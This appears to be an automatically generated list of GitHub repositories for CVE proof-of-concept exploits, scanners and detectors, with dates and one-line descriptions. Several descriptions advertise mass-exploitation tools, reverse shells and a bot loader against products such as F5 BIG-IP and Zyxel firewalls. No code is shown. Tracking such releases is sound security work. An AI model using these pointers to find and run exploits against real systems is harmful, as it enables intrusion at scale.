**Triconsole 3.75 - Reflected XSS** : [trhacknon/CVE-2021-27330](https://github.com/trhacknon/CVE-2021-27330) create time: 2022-05-25T00:09:20Z

**🍵 Gitea repository migration remote command execution exploit.** : [wuhan005/CVE-2022-30781](https://github.com/wuhan005/CVE-2022-30781) create time: 2022-05-22T05:15:58Z

**no description** : [b1ackros337/CVE-2020-25213](https://github.com/b1ackros337/CVE-2020-25213) create time: 2022-05-24T16:35:23Z

**SDT-CW3B1 1.1.0 - OS Command Injection** : [nobodyatall648/CVE-2021-46422](https://github.com/nobodyatall648/CVE-2021-46422) create time: 2022-05-24T16:45:41Z

**CVE-2022-1292** : [li8u99/CVE-2022-1292](https://github.com/li8u99/CVE-2022-1292) create time: 2022-05-24T09:26:29Z

**no description** : [whr819987540/test_CVE-2020-26233](https://github.com/whr819987540/test_CVE-2020-26233) create time: 2022-05-24T08:49:01Z

**no description** : [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25235](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25235) create time: 2022-05-24T07:00:24Z

**Tinker Script for CVE-2022-23046** : [bernauers/CVE-2022-23046](https://github.com/bernauers/CVE-2022-23046) create time: 2022-05-23T20:44:15Z

**Initial POC for the CVE-2022-30525** : [iveresk/cve-2022-30525](https://github.com/iveresk/cve-2022-30525) create time: 2022-05-23T16:51:42Z

**Vulnearability Report of the New Jersey official site** : [korestreet/https-nj.gov---CVE-2018-14042](https://github.com/korestreet/https-nj.gov---CVE-2018-14042) create time: 2022-05-23T08:27:22Z

**Vulnearability Report of the New Jersey official site** : [korestreet/https-nj.gov---CVE-2018-14040](https://github.com/korestreet/https-nj.gov---CVE-2018-14040) create time: 2022-05-23T08:11:01Z

**Vulnearability Report of the New Jersey official site** : [korestreet/https-nj.gov---CVE-2018-14041](https://github.com/korestreet/https-nj.gov---CVE-2018-14041) create time: 2022-05-23T07:59:01Z

**Vulnearability Report of the New Jersey official site** : [korestreet/https-nj.gov---CVE-2019-11358](https://github.com/korestreet/https-nj.gov---CVE-2019-11358) create time: 2022-05-23T08:51:42Z

**Vulnearability Report of the New Jersey official site** : [korestreet/https-nj.gov---CVE-2019-8331](https://github.com/korestreet/https-nj.gov---CVE-2019-8331) create time: 2022-05-23T07:48:19Z

**Vulnearability Report of the New Jersey official site** : [korestreet/https-nj.gov---CVE-2020-11023](https://github.com/korestreet/https-nj.gov---CVE-2020-11023) create time: 2022-05-23T10:49:19Z

**Vulnearability Report of the New Jersey official site** : [korestreet/https-nj.gov---CVE-2020-11022](https://github.com/korestreet/https-nj.gov---CVE-2020-11022) create time: 2022-05-23T10:26:10Z

**Case for CVE-2022-30778** : [kang8/CVE-2022-30778](https://github.com/kang8/CVE-2022-30778) create time: 2022-05-23T07:04:54Z

**Aplicação para explorar CVEs e calcular CVSSs. Atividade de segurança de aplicações (2022/1)** : [Jefh-Graduacao/segapps-cve-exporer](https://github.com/Jefh-Graduacao/segapps-cve-exporer) create time: 2022-05-23T00:34:07Z

**CVE 2005 exploit.Perl in Perl.** : [RizeKishimaro/CVE-2005-3299](https://github.com/RizeKishimaro/CVE-2005-3299) create time: 2022-05-22T15:14:57Z

**Apache CouchDB 3.2.1 - Remote Code Execution (RCE)** : [XmasSnowISBACK/CVE-2022-24706](https://github.com/XmasSnowISBACK/CVE-2022-24706) create time: 2022-05-22T13:37:06Z

**MSF screenshot module with privelage escalation/bypass on MacOS** : [XmasSnowISBACK/CVE-2022-26726](https://github.com/XmasSnowISBACK/CVE-2022-26726) create time: 2022-05-22T13:31:52Z

**Case for CVE-2021-43503** : [kang8/CVE-2021-43503](https://github.com/kang8/CVE-2021-43503) create time: 2022-05-22T12:54:39Z

**CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust** : [XmasSnowISBACK/CVE-2022-1388](https://github.com/XmasSnowISBACK/CVE-2022-1388) create time: 2022-05-22T13:27:33Z

**cve-2022-1040 is an auth bypass and remote code execution in webmin portal of sophos firewall** : [XmasSnowISBACK/CVE-2022-1040](https://github.com/XmasSnowISBACK/CVE-2022-1040) create time: 2022-05-22T13:23:20Z

**PoC for CVE-2022-21971 "Windows Runtime Remote Code Execution Vulnerability"** : [XmasSnowISBACK/CVE-2022-21971](https://github.com/XmasSnowISBACK/CVE-2022-21971) create time: 2022-05-22T13:20:39Z

**cve-2022-1040 is an auth bypass and remote code execution in webmin portal of sophos firewall** : [cve-hunter/CVE-2022-1040-RCE](https://github.com/cve-hunter/CVE-2022-1040-RCE) create time: 2022-05-22T12:21:01Z

**Big-Ip auth bypass and rce** : [seciurdt/CVE-2022-1388-mass](https://github.com/seciurdt/CVE-2022-1388-mass) create time: 2022-05-22T12:08:25Z

**no description** : [pashayogi/CVE-2020-7961-Mass](https://github.com/pashayogi/CVE-2020-7961-Mass) create time: 2022-05-22T08:40:53Z

**no description** : [trhacknon/CVE-2022-22963](https://github.com/trhacknon/CVE-2022-22963) create time: 2022-05-21T22:10:16Z

**Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution** : [UNICORDev/exploit-CVE-2020-5844](https://github.com/UNICORDev/exploit-CVE-2020-5844) create time: 2022-05-19T22:50:44Z

**A login bypass(CVE-2019-18371) and a command injection vulnerability(CVE-2019-18370) in Xiaomi Router R3G up to versi…** : [jsnhcuan1997/UltramanGaia](https://github.com/jsnhcuan1997/UltramanGaia) create time: 2022-05-21T16:30:37Z

**CVE-2022-22916,O2OA RCE 远程命令执行** : [aodsec/CVE-2022-22916](https://github.com/aodsec/CVE-2022-22916) create time: 2022-05-21T16:28:23Z

**A Simple bash script that patches the CVE-2022-0847 (dirty pipe) kernel vulnerability on Debian 11** : [IHenakaarachchi/debian11-dirty_pipe-patcher](https://github.com/IHenakaarachchi/debian11-dirty_pipe-patcher) create time: 2022-05-21T15:14:51Z

**no description** : [sudoninja-noob/CVE-2022-29009](https://github.com/sudoninja-noob/CVE-2022-29009) create time: 2022-05-21T11:58:36Z

**no description** : [sudoninja-noob/CVE-2022-29008](https://github.com/sudoninja-noob/CVE-2022-29008) create time: 2022-05-21T11:58:26Z

**no description** : [sudoninja-noob/CVE-2022-29007](https://github.com/sudoninja-noob/CVE-2022-29007) create time: 2022-05-21T11:57:04Z

**no description** : [sudoninja-noob/CVE-2022-29006](https://github.com/sudoninja-noob/CVE-2022-29006) create time: 2022-05-21T11:55:36Z

**no description** : [sudoninja-noob/CVE-2022-29005](https://github.com/sudoninja-noob/CVE-2022-29005) create time: 2022-05-21T11:53:35Z

**no description** : [BabyTeam1024/CVE-2022-26318](https://github.com/BabyTeam1024/CVE-2022-26318) create time: 2022-05-21T11:51:58Z

**no description** : [sudoninja-noob/CVE-2022-29004](https://github.com/sudoninja-noob/CVE-2022-29004) create time: 2022-05-21T11:30:32Z

**cve-2021-4034 for single commcand** : [wudicainiao/cve-2021-4034](https://github.com/wudicainiao/cve-2021-4034) create time: 2022-05-21T05:42:01Z

**race condition in apport lead to Local Privilege Escalation on Ubuntu** : [liumuqing/CVE-2021-3899_PoC](https://github.com/liumuqing/CVE-2021-3899_PoC) create time: 2022-05-21T01:52:34Z

**Recursive MMIO VM Escape PoC** : [QiuhaoLi/CVE-2021-3929-3947](https://github.com/QiuhaoLi/CVE-2021-3929-3947) create time: 2022-05-13T05:33:28Z

**no description** : [trhacknon/CVE-2022-26717-Safari-WebGL-Exploit](https://github.com/trhacknon/CVE-2022-26717-Safari-WebGL-Exploit) create time: 2022-05-20T20:46:40Z

**CVE-2022-26809 | is a remote code execution vulnerablity in rpc runtime and affects a wide versions of windows** : [seciurdt/CVE-2022-26809-MASS](https://github.com/seciurdt/CVE-2022-26809-MASS) create time: 2022-05-20T15:16:30Z

**CVE-2022-26809 is a vulnerability in Remote Procedure Call Runtime** : [XmasSnowISBACK/CVE-2022-26809](https://github.com/XmasSnowISBACK/CVE-2022-26809) create time: 2022-05-20T14:26:38Z

**CVE-2017-1000486** : [prok3z/Nuclei-Template-Primefaces-RCE](https://github.com/prok3z/Nuclei-Template-Primefaces-RCE) create time: 2022-05-20T12:43:10Z

**CVE-2022-31245: RCE and domain admin privilege escalation for Mailcow** : [ly1g3/Mailcow-CVE-2022-31245](https://github.com/ly1g3/Mailcow-CVE-2022-31245) create time: 2022-05-20T10:05:55Z

**CVE-2021-44228 PoC for more than 12 affected softwares(not publicly disclossed yet) with mass exploitation script for each.** : [TomArni680/CVE-2021-44228-RCE](https://github.com/TomArni680/CVE-2021-44228-RCE) create time: 2022-05-20T09:48:24Z

**no description** : [ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302](https://github.com/ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302) create time: 2022-05-20T06:33:47Z

**Apache CouchDB 3.2.1 - Remote Code Execution (RCE)** : [sadshade/CVE-2022-24706-CouchDB-Exploit](https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit) create time: 2022-05-20T04:28:51Z

**CVE-2022-22965 Spring4Shell research & PoC** : [cxzero/CVE-2022-22965-spring4shell](https://github.com/cxzero/CVE-2022-22965-spring4shell) create time: 2022-05-19T23:16:40Z

**no description** : [trhacknon/CVE-2022-28590](https://github.com/trhacknon/CVE-2022-28590) create time: 2022-05-19T21:27:09Z

**no description** : [trhacknon/CVE-2022-29464](https://github.com/trhacknon/CVE-2022-29464) create time: 2022-05-19T21:24:02Z

**no description** : [corelight/cve-2022-22954](https://github.com/corelight/cve-2022-22954) create time: 2022-04-12T18:08:58Z

**一个可单独、批量验证的脚本,也可以反弹shell** : [anansec/CVE-2022-22947_EXP](https://github.com/anansec/CVE-2022-22947_EXP) create time: 2022-05-19T14:58:45Z

**This repository is developed to analysis and understand DirtyPipe exploit CVE-2022-0847** : [VinuKalana/DirtyPipe-CVE-2022-0847](https://github.com/VinuKalana/DirtyPipe-CVE-2022-0847) create time: 2022-05-17T04:23:34Z

**no description** : [caiquebaracho/CVE-2021-44228](https://github.com/caiquebaracho/CVE-2021-44228) create time: 2022-05-19T13:49:40Z

**This repository contains studies on CVE-2021-44228. I would like to thank everyone who somehow supported the development of this work.** : [caiquebaracho/CVE-2021-44228](https://github.com/caiquebaracho/CVE-2021-44228) create time: 2022-05-18T22:58:26Z

**CVE-2022-30525 Zyxel防火墙命令注入漏洞 POC&EXP** : [west9b/CVE-2022-30525](https://github.com/west9b/CVE-2022-30525) create time: 2022-05-19T12:21:08Z

**CVE-2022-30525 Zyxel防火墙命令注入漏洞 POC&EXP** : [160Team/CVE-2022-30525](https://github.com/160Team/CVE-2022-30525) create time: 2022-05-19T12:09:42Z

**PoC for Dirty COW (CVE-2016-5195)** : [1equeneRise/scumjr9](https://github.com/1equeneRise/scumjr9) create time: 2022-05-19T10:53:43Z

**CVE-2022-26809 RCE Exploit Remote Code Execution** : [rkxxz/CVE-2022-26809](https://github.com/rkxxz/CVE-2022-26809) create time: 2022-05-19T03:35:02Z

**CVE-2022-24500 RCE Exploit Remote Code Execution Vulnerability** : [rkxxz/CVE-2022-24500](https://github.com/rkxxz/CVE-2022-24500) create time: 2022-05-19T03:32:12Z

**no description** : [theori-io/CVE-2022-26717-Safari-WebGL-Exploit](https://github.com/theori-io/CVE-2022-26717-Safari-WebGL-Exploit) create time: 2022-05-19T01:16:01Z

**Verifed Proof of Concept on CVE-2022-24086** : [oK0mo/CVE-2022-24086-RCE-PoC](https://github.com/oK0mo/CVE-2022-24086-RCE-PoC) create time: 2022-05-19T01:15:57Z

**no description** : [trhacknon/XSS-CVE-2022-30489](https://github.com/trhacknon/XSS-CVE-2022-30489) create time: 2022-05-18T23:28:06Z

**no description** : [trhacknon/CVE-2022-23131](https://github.com/trhacknon/CVE-2022-23131) create time: 2022-05-18T17:18:45Z

**no description** : [trhacknon/CVE-2022-30525-Reverse-Shell](https://github.com/trhacknon/CVE-2022-30525-Reverse-Shell) create time: 2022-05-18T15:57:03Z

**CVE-2022-30780 - lighttpd remote denial of service** : [p0dalirius/CVE-2022-30780-lighttpd-denial-of-service](https://github.com/p0dalirius/CVE-2022-30780-lighttpd-denial-of-service) create time: 2022-05-18T12:01:17Z

**Simple python script to exploit CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection** : [Chocapikk/CVE-2022-30525-Reverse-Shell](https://github.com/Chocapikk/CVE-2022-30525-Reverse-Shell) create time: 2022-05-18T15:22:17Z

**Analysis, POC and Explanation of CVE-2021-1732** : [reccoon-dev/CVE-2021-1732](https://github.com/reccoon-dev/CVE-2021-1732) create time: 2022-05-18T13:34:07Z

**CVE-2021-44228 PoC for more than 12 affected softwares(not publicly disclossed yet) with mass exploitation script for each.** : [kuznyJan1972/CVE-2021-44228-mass](https://github.com/kuznyJan1972/CVE-2021-44228-mass) create time: 2022-05-18T12:30:14Z

**zyxel firewall unauthenticated rce mass multi threaded exploit** : [kuznyJan1972/CVE-2022-30525-mass](https://github.com/kuznyJan1972/CVE-2022-30525-mass) create time: 2022-05-18T12:10:11Z

**The Repository contains documents that explains the explotation of CVE-2016-5195** : [malinthag62/The-exploitation-of-Dirty-Cow-CVE-2016-5195](https://github.com/malinthag62/The-exploitation-of-Dirty-Cow-CVE-2016-5195) create time: 2022-05-18T10:51:23Z

**no description** : [jakabakos/CVE-2017-9096](https://github.com/jakabakos/CVE-2017-9096) create time: 2022-05-18T10:03:53Z

**no description** : [litios/cve_2021_3572-old-pip](https://github.com/litios/cve_2021_3572-old-pip) create time: 2022-05-18T10:08:35Z

**Franklin Fueling Systems Colibri Controller Module - Local File Inclusion** : [Henry4E36/CVE-2021-46417](https://github.com/Henry4E36/CVE-2021-46417) create time: 2022-05-18T09:14:51Z

**A POC for CVE-2021-3572 against old pips (9.x.x)** : [litios/cve_2021_3572-old-pip](https://github.com/litios/cve_2021_3572-old-pip) create time: 2022-05-18T08:42:31Z

**no description** : [yonggui-li/CVE-2020-4464-and-CVE-2020-4450](https://github.com/yonggui-li/CVE-2020-4464-and-CVE-2020-4450) create time: 2022-05-18T02:02:51Z

**Zyxel multithreaded Mass Exploitation tool compatible with URL/IP lists.** : [ExploitPwner/CVE-2022-30525-Zyxel-Mass-Exploiter](https://github.com/ExploitPwner/CVE-2022-30525-Zyxel-Mass-Exploiter) create time: 2022-05-17T15:58:19Z

**no description** : [afaq1337/CVE-2021-41946](https://github.com/afaq1337/CVE-2021-41946) create time: 2022-05-17T15:23:12Z

**Detects attempts and successful exploitation of CVE-2022-26809** : [corelight/cve-2022-26809](https://github.com/corelight/cve-2022-26809) create time: 2022-04-14T16:58:09Z

**no description** : [phor3nsic/CVE-2021-40822](https://github.com/phor3nsic/CVE-2021-40822) create time: 2022-05-17T13:58:11Z

**Details regarding the Z-Wave S0-No-More attack** : [ITSecLab-HSEL/CVE-2022-24611](https://github.com/ITSecLab-HSEL/CVE-2022-24611) create time: 2022-05-17T11:55:09Z

**CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust** : [aancw/CVE-2022-1388-rs](https://github.com/aancw/CVE-2022-1388-rs) create time: 2022-05-17T10:51:39Z

**CVE-2018-6574: go get RCE** : [ThaFWord/pentesterlab](https://github.com/ThaFWord/pentesterlab) create time: 2022-05-17T08:32:20Z

**CVE-2022-1388** : [getdrive/F5-BIG-IP-exploit](https://github.com/getdrive/F5-BIG-IP-exploit) create time: 2022-05-17T03:23:39Z

**Multithread Golang application** : [iveresk/cve-2022-21907](https://github.com/iveresk/cve-2022-21907) create time: 2022-05-16T17:42:45Z

**[Reserved for CVE-2022-30006]** : [ComparedArray/printix-CVE-2022-30006](https://github.com/ComparedArray/printix-CVE-2022-30006) create time: 2022-05-16T16:15:52Z

**The plugin, used as a companion for the Discy and Himer themes, does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks** : [V35HR4J/CVE-2022-1598](https://github.com/V35HR4J/CVE-2022-1598) create time: 2022-05-16T15:33:48Z

**Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947) 注入哥斯拉内存马** : [0730Nophone/CVE-2022-22947-](https://github.com/0730Nophone/CVE-2022-22947-) create time: 2022-05-16T15:27:41Z

**no description** : [ratiros01/CVE-2014-8609-exploit](https://github.com/ratiros01/CVE-2014-8609-exploit) create time: 2022-05-16T13:24:39Z

**no description** : [user16-et/cve-2021-21972_PoC](https://github.com/user16-et/cve-2021-21972_PoC) create time: 2022-05-16T11:57:42Z

**Persistent XSS on 'last_known_version' field (My Settings)** : [patrickdeanramos/CVE-2022-28598](https://github.com/patrickdeanramos/CVE-2022-28598) create time: 2022-05-16T10:27:47Z

**Persistent XSS on 'last_known_version' field (My Settings)** : [patrickdeanramos/CVE-2022-28598](https://github.com/patrickdeanramos/CVE-2022-28598) create time: 2022-05-16T10:17:37Z

**CVE-2022-30525 POC exploit** : [superzerosec/CVE-2022-30525](https://github.com/superzerosec/CVE-2022-30525) create time: 2022-05-16T09:15:43Z

**CVE-2021-21315-ENV** : [H3rmesk1t/CVE-2021-21315-ENV](https://github.com/H3rmesk1t/CVE-2021-21315-ENV) create time: 2022-05-16T08:30:31Z

**no description** : [ratiros01/CVE-2004-1561](https://github.com/ratiros01/CVE-2004-1561) create time: 2020-06-09T14:54:00Z

**CVE-2022-30525(Zxyel 防火墙命令注入)的概念证明漏洞利用** : [YGoldking/CVE-2022-30525](https://github.com/YGoldking/CVE-2022-30525) create time: 2022-05-16T04:45:43Z

**Exploit for CVE-2021-3560 (Polkit)** : [UNICORDev/exploit-CVE-2021-3560](https://github.com/UNICORDev/exploit-CVE-2021-3560) create time: 2022-05-02T23:56:31Z

**no description** : [Wrin9/CVE-2022-1388](https://github.com/Wrin9/CVE-2022-1388) create time: 2022-05-16T01:49:44Z

**MyBB 1.8.29 - Remote Code Execution** : [lavclash75/mybb-CVE-2022-24734](https://github.com/lavclash75/mybb-CVE-2022-24734) create time: 2022-05-15T19:18:32Z

**Private keys vulnerable to Debian OpenSSL bug (CVE-2008-0166)** : [badkeys/debianopenssl](https://github.com/badkeys/debianopenssl) create time: 2022-05-15T10:28:03Z

**Improved POC for CVE-2022-1388 that affects multiple F5 products.** : [iveresk/cve-2022-1388-iveresk-command-shell](https://github.com/iveresk/cve-2022-1388-iveresk-command-shell) create time: 2022-05-15T08:58:22Z

**A bots loader for CVE-2022-29464 with multithreading** : [Inplex-sys/CVE-2022-29464-loader](https://github.com/Inplex-sys/CVE-2022-29464-loader) create time: 2022-05-15T08:51:16Z

**Private keys generated with vulnerable keypair versions (CVE-2021-41117)** : [badkeys/keypairvuln](https://github.com/badkeys/keypairvuln) create time: 2022-05-15T06:56:53Z

**Zyxel Firewall Remote Command Injection Vulnerability (CVE-2022-30525) Batch Detection Script** : [M4fiaB0y/CVE-2022-30525](https://github.com/M4fiaB0y/CVE-2022-30525) create time: 2022-05-15T06:20:06Z

**An Improved Proof of Concept for CVE-2022-1388 w/ Interactive an Shell** : [PsychoSec2/CVE-2022-1388-POC](https://github.com/PsychoSec2/CVE-2022-1388-POC) create time: 2022-05-15T03:58:21Z

**cve-2021-38314 - Unauthenticated Sensitive Information Disclosure** : [twseptian/cve-2021-38314](https://github.com/twseptian/cve-2021-38314) create time: 2022-05-15T02:10:01Z

**An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.** : [ahsentekdemir/CVE-2022-28346](https://github.com/ahsentekdemir/CVE-2022-28346) create time: 2022-05-15T00:24:19Z

**An improved Proof of Concept for CVE-2022-1388 w/ Interactive Shell. No reverse tcp required!** : [PsychoSec2/CVE-2022-1388-POC](https://github.com/PsychoSec2/CVE-2022-1388-POC) create time: 2022-05-14T19:23:16Z

**In essence, the vulnerability allowed a low-privileged user to escalate privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed.** : [LudovicPatho/CVE-2022-26923_AD-Certificate-Services](https://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services) create time: 2022-05-14T09:27:06Z

**Technical Analysis of the SMB vulnerability (CVE-2017-0143) & its impact on the vulnerable system** : [SampatDhakal/Metasploit-Attack-Report](https://github.com/SampatDhakal/Metasploit-Attack-Report) create time: 2022-05-14T07:26:31Z

**no description** : [badboycxcc/XSS-CVE-2022-30489](https://github.com/badboycxcc/XSS-CVE-2022-30489) create time: 2022-05-06T00:47:51Z

**no description** : [cxaqhq/netgear-to-CVE-2022-29383](https://github.com/cxaqhq/netgear-to-CVE-2022-29383) create time: 2021-12-26T13:33:16Z

**no description** : [badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383](https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383) create time: 2021-12-22T10:06:59Z

**A proof-of-concept font with a write-up attached.** : [Exploitables/CVE-2022-26927](https://github.com/Exploitables/CVE-2022-26927) create time: 2022-05-14T04:12:23Z

**Zyxel 防火墙未经身份验证的远程命令注入** : [savior-only/CVE-2022-30525](https://github.com/savior-only/CVE-2022-30525) create time: 2022-05-13T18:16:31Z

**no description** : [testaross4/CVE-2007-2447](https://github.com/testaross4/CVE-2007-2447) create time: 2022-05-13T14:15:28Z

**Zyxel 防火墙远程命令注入漏洞(CVE-2022-30525)批量检测脚本** : [shuai06/CVE-2022-30525](https://github.com/shuai06/CVE-2022-30525) create time: 2022-05-13T12:58:43Z

**Log4Shell Proof-Of-Concept derived from https://github.com/kozmer/log4j-shell-poc** : [Phineas09/CVE-2021-44228](https://github.com/Phineas09/CVE-2021-44228) create time: 2022-05-13T11:35:22Z

**Zyxel 防火墙远程命令注入漏洞(CVE-2022-30525)** : [Henry4E36/CVE-2022-30525](https://github.com/Henry4E36/CVE-2022-30525) create time: 2022-05-13T12:03:28Z

**Tool for CVE-2022-1388** : [justakazh/CVE-2022-1388](https://github.com/justakazh/CVE-2022-1388) create time: 2022-05-13T10:18:29Z

**Melissa** : [itstarsec/CVE-2020-0618](https://github.com/itstarsec/CVE-2020-0618) create time: 2022-05-13T08:58:16Z

**WPQA < 5.2 - Subscriber+ Stored Cross-Site Scripting via Profile fields** : [V35HR4J/CVE-2022-1051](https://github.com/V35HR4J/CVE-2022-1051) create time: 2022-05-13T06:50:25Z

**Essay (and PoCs) about CVE-2021-41773, a remote code execution vulnerability in Apache 2.4.49 🕸️** : [iosifache/ApacheRCEEssay](https://github.com/iosifache/ApacheRCEEssay) create time: 2022-05-12T13:23:08Z

**NETATALK-AFP-PROTO RCE :| This CVE-2022-23121 allows remote malicious users to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parse_entries function. The issue results from the lack of proper error handling when parsing AppleDouble entries. An attacker can leverage this vulnerability to execute code in the context of root.** : [kuznyJan1972/CVE-2022-23121-RCE](https://github.com/kuznyJan1972/CVE-2022-23121-RCE) create time: 2022-05-12T20:58:01Z

**Testing CVE-2022-22968** : [MarcinGadz/spring-rce-poc](https://github.com/MarcinGadz/spring-rce-poc) create time: 2022-05-12T18:25:18Z

**F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB** : [Zeyad-Azima/CVE-2022-1388](https://github.com/Zeyad-Azima/CVE-2022-1388) create time: 2022-05-12T16:54:52Z

**CVE-2022-23121 中使用到的自定义 nmap 脚本,以及 docker 环境** : [kejaly/CVE-2022-23121-nmap](https://github.com/kejaly/CVE-2022-23121-nmap) create time: 2022-05-12T17:07:08Z

**CVE-2022-23253 PoC** : [nettitude/CVE-2022-23253-PoC](https://github.com/nettitude/CVE-2022-23253-PoC) create time: 2022-05-12T13:18:47Z

**Proof of concept exploit for CVE-2022-30525 (Zxyel firewall command injection)** : [jbaines-r7/victorian_machinery](https://github.com/jbaines-r7/victorian_machinery) create time: 2022-05-10T10:31:19Z

**Nuclei Template for CVE-2022-1388** : [SecTheBit/CVE-2022-1388](https://github.com/SecTheBit/CVE-2022-1388) create time: 2022-05-12T12:17:11Z

**no description** : [Nivaskumark/external_expat_v2.1.0_CVE-2022-25315](https://github.com/Nivaskumark/external_expat_v2.1.0_CVE-2022-25315) create time: 2022-05-12T11:07:10Z

**no description** : [Calvitz/CVE-2022-26809](https://github.com/Calvitz/CVE-2022-26809) create time: 2022-05-12T07:12:08Z

**CVE-2022-27134** : [Kenun99/CVE-batdappboomx](https://github.com/Kenun99/CVE-batdappboomx) create time: 2022-03-11T09:09:19Z

**CVE-2021-41773 Shodan scanner** : [anldori/CVE-2021-41773-Scanner](https://github.com/anldori/CVE-2021-41773-Scanner) create time: 2022-05-12T03:42:24Z

**no description** : [Calvitz/CVE-2022-26809](https://github.com/Calvitz/CVE-2022-26809) create time: 2022-05-12T03:22:31Z

**CVE-2020-0688_Microsoft Exchange default MachineKeySection deserialize vulnerability** : [7heKnight/CVE-2020-0688](https://github.com/7heKnight/CVE-2020-0688) create time: 2022-05-12T03:17:35Z

**CVE-2021-41773 Shodan Scanner** : [anldori/CVE-2021-41773-Scan](https://github.com/anldori/CVE-2021-41773-Scan) create time: 2022-05-12T02:58:14Z

**Walkthrough on the exploitation of CVE-2022-26923, a vulnerability in AD Certificate Services** : [r1skkam/TryHackMe-CVE-2022-26923](https://github.com/r1skkam/TryHackMe-CVE-2022-26923) create time: 2022-05-12T02:31:50Z

**no description** : [pauloink/CVE-2022-1388](https://github.com/pauloink/CVE-2022-1388) create time: 2022-05-11T21:55:43Z

**CVE-2022-26809 | is a remote code execution vulnerablity in rpc runtime and affects a wide versions of windows** : [seciurdt/CVE-2022-26809-RCE](https://github.com/seciurdt/CVE-2022-26809-RCE) create time: 2022-05-11T20:38:55Z

**This repository consists of the python exploit for CVE-2022-1388 (F5's BIG-IP Authentication Bypass to RCE)** : [omnigodz/CVE-2022-1388](https://github.com/omnigodz/CVE-2022-1388) create time: 2022-05-11T20:27:36Z

**This repository consists of the python exploit for CVE-2022-1388 (F5's BIG-IP Authentication Bypass to RCE)** : [omnigodz/CVE-2022-1388](https://github.com/omnigodz/CVE-2022-1388) create time: 2022-05-11T20:24:02Z

**CVE-2022-1388** : [mr-vill4in/CVE-2022-1388](https://github.com/mr-vill4in/CVE-2022-1388) create time: 2022-05-11T20:13:09Z

**CVE-2022-1388 Scanner** : [EvilLizard666/CVE-2022-1388](https://github.com/EvilLizard666/CVE-2022-1388) create time: 2022-05-11T19:33:37Z

**no description** : [AmirHoseinTangsiriNET/CVE-2022-1388-Scanner](https://github.com/AmirHoseinTangsiriNET/CVE-2022-1388-Scanner) create time: 2022-05-11T17:43:44Z

**big-ip icontrol rest auth bypass RCE MASS with huge list of ip dumped** : [kuznyJan1972/cve-2022-1388-mass](https://github.com/kuznyJan1972/cve-2022-1388-mass) create time: 2022-05-11T14:57:31Z

**no description** : [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315) create time: 2022-05-11T09:31:06Z

**Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface method, a related issue to CVE-2012-6636.** : [Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability](https://github.com/Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability) create time: 2022-05-11T08:53:56Z

**no description** : [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25314](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25314) create time: 2022-05-11T09:11:39Z

**no description** : [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313) create time: 2022-05-11T07:40:30Z

**WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在安全漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。** : [adminsec5247/CVE-2020-25213-wordpress-wp-file-manager-fileupload](https://github.com/adminsec5247/CVE-2020-25213-wordpress-wp-file-manager-fileupload) create time: 2022-05-11T07:10:15Z

**Home Owners Collection Management System 1.0 - Reflected XSS** : [bigzooooz/CVE-2022-28078](https://github.com/bigzooooz/CVE-2022-28078) create time: 2022-05-11T06:28:28Z

**Home Owners Collection Management System 1.0 - Reflected XSS** : [bigzooooz/CVE-2022-28077](https://github.com/bigzooooz/CVE-2022-28077) create time: 2022-05-11T06:23:46Z

**On F5 BIG-IP undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated** : [ExploitPwner/CVE-2022-1388](https://github.com/ExploitPwner/CVE-2022-1388) create time: 2022-05-11T00:15:07Z

**no description** : [0xAgun/CVE-2022-1388](https://github.com/0xAgun/CVE-2022-1388) create time: 2022-05-10T20:49:12Z

**no description** : [gerr-re/cve-2022-28944](https://github.com/gerr-re/cve-2022-28944) create time: 2022-05-10T17:52:31Z

**no description** : [sprushed/CVE-2022-30292](https://github.com/sprushed/CVE-2022-30292) create time: 2022-05-10T16:39:00Z

**An unauthenticated attacker can send an HTTP request with an "Accept-Encoding" HTTP request header triggering a double free in the unknown coding-list inside the HTTP Protocol Stack (http.sys) to process packets, resulting in a kernel crash.** : [iveresk/cve-2021-43008-1vere-k](https://github.com/iveresk/cve-2021-43008-1vere-k) create time: 2022-05-10T16:00:50Z

**CVE-2022-1388-PocExp,新增了多线程,F5 BIG-IP RCE exploitation** : [aodsec/CVE-2022-1388-PocExp](https://github.com/aodsec/CVE-2022-1388-PocExp) create time: 2022-05-10T15:44:50Z

